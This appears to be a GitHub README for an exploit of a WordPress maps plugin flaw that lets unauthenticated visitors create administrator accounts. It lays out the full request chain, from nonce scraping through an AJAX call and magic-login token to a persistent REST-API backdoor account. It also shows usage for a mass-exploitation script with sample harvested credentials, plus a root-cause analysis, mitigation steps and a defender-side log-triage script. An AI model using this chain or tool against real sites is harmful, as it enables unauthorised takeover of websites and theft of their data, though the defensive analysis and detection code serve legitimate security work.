xShadow-Here/CVE-2026-8732

GitHub: xShadow-Here/CVE-2026-8732

Stars: 0 | Forks: 1

CVE-2026-8732 — WP Maps Pro ≤ 6.1.0

♡ Unauthenticated Privilege Escalation via Administrator Account Creation ♡
=== shadow ♡ & friska ===

## 📋 Vulnerability Info
| Field | Details |
|-------|---------|
| **CVE ID** | CVE-2026-8732 |
| **CVSS Score** | 9.8 (Critical) |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Type** | Missing Authentication for Critical Function |
| **Plugin** | WP Maps Pro (`wp-google-map-gold`) |
| **Affected** | All versions ≤ 6.1.0 |
| **Patched** | 6.1.1 |
| **Published** | May 28, 2026 |
| **Researcher** | [David Brown](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/david-brown) |
| **PoC** | Shadow & Friska 😈 |
## 🔍 Description

The **WP Maps Pro** plugin for WordPress is vulnerable to **Unauthenticated Privilege Escalation via Administrator Account Creation**. The `wpgmp_temp_access_ajax` AJAX action is registered with `wp_ajax_nopriv_` and protected only by a nonce check on the `fc-call-nonce` nonce, which is **publicly embedded in every frontend page** via `wp_localize_script` as the `nonce` field of the `wpgmp_local` JavaScript object. That makes the nonce check **useless as an access control**: an unauthenticated attacker can

1. extract the nonce from any public page,
2. invoke the `wpgmp_temp_access_support` handler with `check_temp=false`,
3. trigger unconditional creation of a new WordPress **Administrator** account,
4. receive a magic login URL; visiting it calls `wp_set_auth_cookie()` for that account and grants a full admin session, and
5. create a persistent backdoor account.

## 🧬 Root Cause Analysis

### 1. Hook Registered Inside an `is_admin()` Block, But `is_admin()` Is Always True for AJAX

`is_admin()` only says that the request is being served from under `/wp-admin/`. `admin-ajax.php` lives there, so the check passes for every AJAX request, authenticated or not, and the `wp_ajax_nopriv_` registration then explicitly opens the handler to logged-out callers.

```php
// wp-google-map-gold.php
if ( is_admin() ) { // is_admin() is TRUE for every admin-ajax.php request
    add_action( 'wp_ajax_wpgmp_temp_access_ajax',        [ $this, 'wpgmp_temp_access_ajax_callback' ] );
    add_action( 'wp_ajax_nopriv_wpgmp_temp_access_ajax', [ $this, 'wpgmp_temp_access_ajax_callback' ] ); // nopriv = unauthenticated
}
```

### 2. Nonce Exposed to Every Frontend Page

```php
// classes/wpgmp-helper.php
$wpgmp_local = [
    'urlforajax' => admin_url( 'admin-ajax.php' ),
    'nonce'      => wp_create_nonce( 'fc-call-nonce' ), // leaked into the public HTML
    // ...
];
wp_localize_script( 'wpgmp-google-map-main', 'wpgmp_local', $wpgmp_local );
```

Any visitor can read the nonce from the page source. WordPress nonces are CSRF tokens, not authentication tokens: `check_ajax_referer()` only proves that the caller obtained the nonce, and here every visitor does.

### 3. No Capability Check in the AJAX Callback

```php
function wpgmp_temp_access_ajax_callback() {
    check_ajax_referer( 'fc-call-nonce', 'nonce' ); // passes with the public nonce
    // no current_user_can() check

    $temp_access = new WPGMP_Temp_Access();
    $response    = $temp_access->wpgmp_temp_access_support();
    wp_send_json( $response );
}
```

### 4. Unconditional Admin Account Creation

```php
// classes/wpgmp-temp-access.php
if ( isset( $_POST['check_temp'] ) && $_POST['check_temp'] == 'false' ) {
    $username = 'fc_user_' . uniqid();        // random username
    $email    = 'support@flippercode.com';    // hardcoded email
    $role     = 'administrator';              // hardcoded role  <- ROOT CAUSE
    $result   = self::fc_create_new_user( $username, $email, $role );
    if ( is_numeric( $result ) ) {
        $access_link     = self::generate_login_link( $result );
        $response['url'] = $access_link;      // magic URL returned to the caller
    }
}
```

The account exists as soon as this branch runs; the magic link is only the delivery mechanism. A defender who sees the AJAX call in the logs but never sees the follow-up login should still assume an administrator account was created.

### 5. Magic Login via the `init` Hook, No Expiry, No Single-Use

```php
// Hooked to init, so it runs on every request with no authentication required
function wpgmp_access_token_check() {
    if ( ! empty( $_GET['wpgmp_token'] ) ) {
        $wpgmp_access_token = $_GET['wpgmp_token']; // assignment abbreviated here
        $temp_access        = new WPGMP_Temp_Access();
        $temp_access->get_valid_user_based_on_wpgmp_token( $wpgmp_access_token );
    }
}

// Inside get_valid_user_based_on_wpgmp_token():
wp_set_current_user( $temporary_user_id, $temporary_user_login );
wp_set_auth_cookie( $temporary_user_id );   // session set as administrator
wp_safe_redirect( admin_url() );            // redirect to the dashboard
```

Nothing in this path expires the token or marks it as used, so the same URL keeps working for as long as the user exists.

## ⚔️ Attack Chain

```text
[Unauthenticated Attacker]
        │
        ▼
GET /any-page/
  ← HTML: wpgmp_local = {"nonce":"XXXXXXXX",...}
        │
        ▼
POST /wp-admin/admin-ajax.php
  action=wpgmp_temp_access_ajax&nonce=XXXXXXXX&check_temp=false
  ← {"url":"https://target.com/wp-admin/?wpgmp_token=<128-hex>"}
        │
        ▼
GET /wp-admin/?wpgmp_token=<128-hex>
  ← wp_set_auth_cookie() fired
  ← 302 → /wp-admin/
        │
        ▼
[Full Administrator Access] 💀
        │
        ▼
POST /wp-json/wp/v2/users
  X-WP-Nonce:
  {"username":"backdoor","password":"...","roles":["administrator"]}
        │
        ▼
[Persistent Backdoor Created] 😈
```

## 🛠️ Tools

### `shadow.py` — Full Exploit Chain

Single target or mass exploitation.

```bash
# Interactive
python3 shadow.py

# Single target
python3 shadow.py -u https://target.com

# Mass exploit
python3 shadow.py -f targets.txt -t 20
```

**Exploit Phases:**

- Phase 1 ▶ Plugin & Feature Detection
- Phase 2 ▶ Nonce Scan (parallel crawler)
- Phase 3 ▶ Admin Creation via AJAX
- Phase 4 ▶ Magic Login (`wp_set_auth_cookie`)
- Phase 5 ▶ Persistent Backdoor (REST API)

**Output (`pwned.txt`):**

```text
1. =======================================================
Target  : https://target.com/wp-admin/
User    : shadow_xxxxx
Pass    : Xk9#mQ2pLrTv8nYw
Email   : xxxxx@xxxx.com
Magic   : https://target.com/wp-admin/?wpgmp_token=...
=======================================================
Cookies :
=======================================================
wordpress_logged_in_...=fc_user_...
=======================================================
```

## 🔒 Mitigation

Update WP Maps Pro to version **6.1.1** or newer. The update stops new accounts from being created, but it does not remove accounts an attacker already made: review the user list for administrators whose login starts with `fc_user_` or whose email is `support@flippercode.com`, and for any administrator created through the REST API in the same time window, delete them, and check the access logs for requests to `/wp-admin/` carrying a `wpgmp_token=` parameter.
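The following is an added, defender-side example; it is not code from this repository or from the plugin. It does two things the sections above describe from the attacker's side: it pulls the leaked `nonce` out of the `wpgmp_local` object that `wp_localize_script` writes into a page (to confirm the exposure from root cause 2 on your own site), and it reconstructs the attack chain per client IP from combined-format (Apache/nginx) access-log lines. The HTML snippet and log lines are constructed for the example, and the stage names and verdict strings are this example's own. One caveat the code encodes: if the attacker sends `action=wpgmp_temp_access_ajax` only in the POST body, that stage never appears in the access log, but the `GET /wp-admin/?wpgmp_token=...` request always does, so the magic-login hit is the reliable indicator.

```python
"""Defender-side triage for the CVE-2026-8732 exploit chain (added example).

  exposed_nonce(html)  -> the `fc-call-nonce` value leaked via `wpgmp_local`, or None
  triage(log_lines)    -> {client_ip: {"stages": [...], "verdict": "..."}}
"""
import json
import re
import sys
from urllib.parse import parse_qs, urlsplit

# wp_localize_script() emits `var wpgmp_local = {...};` with JSON-encoded values.
LOCALIZE_RE = re.compile(r"var\s+wpgmp_local\s*=\s*(\{.*?\});", re.S)

# Combined log format: client identd user [ts] "METHOD target proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def exposed_nonce(html):
    """Return the `nonce` field of wpgmp_local if the page leaks it, else None."""
    m = LOCALIZE_RE.search(html)
    if not m:
        return None
    try:
        return json.loads(m.group(1)).get("nonce")
    except ValueError:
        return None


def classify(line):
    """Map one access-log line to (ip, stage), or None if it is not an indicator."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query)
    # Stage 3 of the chain: only visible when `action` travels in the query string.
    if (m["method"] == "POST" and url.path.endswith("/admin-ajax.php")
            and "wpgmp_temp_access_ajax" in query.get("action", [])):
        return m["ip"], "ajax_admin_create"
    # Stage 4: the init hook consumes wpgmp_token on any request, so this is always logged.
    if query.get("wpgmp_token"):
        return m["ip"], "magic_login"
    # Stage 5: REST user creation (pretty permalink or rest_route form).
    if m["method"] == "POST" and (url.path == "/wp-json/wp/v2/users"
                                  or query.get("rest_route") == ["/wp/v2/users"]):
        return m["ip"], "rest_user_create"
    return None


def verdict(stages):
    """The AJAX call alone already creates the administrator (root cause 4)."""
    if "magic_login" in stages and "rest_user_create" in stages:
        return "exploited_with_backdoor"
    if "magic_login" in stages:
        return "exploited"
    if "ajax_admin_create" in stages:
        return "admin_created_login_not_seen"
    return "none"


def triage(lines):
    """Group indicators by client IP, keeping stages in order of first appearance."""
    seen = {}
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        ip, stage = hit
        stages = seen.setdefault(ip, [])
        if stage not in stages:
            stages.append(stage)
    return {ip: {"stages": s, "verdict": verdict(s)} for ip, s in seen.items()}


# --- constructed sample data; not captured from any real site --------------------
FAKE_TOKEN = "ab" * 64  # the README describes the token as 128 hex characters
SAMPLE_HTML = ('<script id="wpgmp-google-map-main-js-extra">var wpgmp_local = '
               '{"urlforajax":"https:\\/\\/example.org\\/wp-admin\\/admin-ajax.php",'
               '"nonce":"d41d8cd98f"};</script>')
SAMPLE_LOG = f"""\
203.0.113.7 - - [28/May/2026:10:01:02 +0000] "GET /contact/ HTTP/1.1" 200 18342 "-" "Mozilla/5.0"
203.0.113.7 - - [28/May/2026:10:01:05 +0000] "POST /wp-admin/admin-ajax.php?action=wpgmp_temp_access_ajax HTTP/1.1" 200 97 "-" "python-requests/2.31.0"
203.0.113.7 - - [28/May/2026:10:01:06 +0000] "GET /wp-admin/?wpgmp_token={FAKE_TOKEN} HTTP/1.1" 302 0 "-" "python-requests/2.31.0"
203.0.113.7 - - [28/May/2026:10:01:08 +0000] "POST /wp-json/wp/v2/users HTTP/1.1" 201 540 "-" "python-requests/2.31.0"
198.51.100.4 - - [28/May/2026:10:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=wpgmp_temp_access_ajax HTTP/1.1" 200 97 "-" "curl/8.4.0"
192.0.2.9 - - [28/May/2026:10:07:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 97 "-" "Mozilla/5.0"
192.0.2.9 - - [28/May/2026:10:07:30 +0000] "GET /wp-admin/?wpgmp_token={FAKE_TOKEN} HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [28/May/2026:10:07:40 +0000] "POST /index.php?rest_route=/wp/v2/users HTTP/1.1" 201 540 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    print("nonce exposed in sample page:", exposed_nonce(SAMPLE_HTML))
    for ip, info in triage(lines).items():
        print(f"{ip:16} {info['verdict']:30} {' -> '.join(info['stages'])}")
```

Run it against a real log with `python3 triage.py /var/log/nginx/access.log`. In the constructed sample, `192.0.2.9` sent the AJAX action in the POST body, so only its magic login and REST call are visible, yet the verdict is still `exploited_with_backdoor`; `198.51.100.4` only ever hit the AJAX endpoint, which per root cause 4 is enough for an administrator account to exist even though no login was observed.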
**[shadow ♡ friska]** — for educational and authorized security research only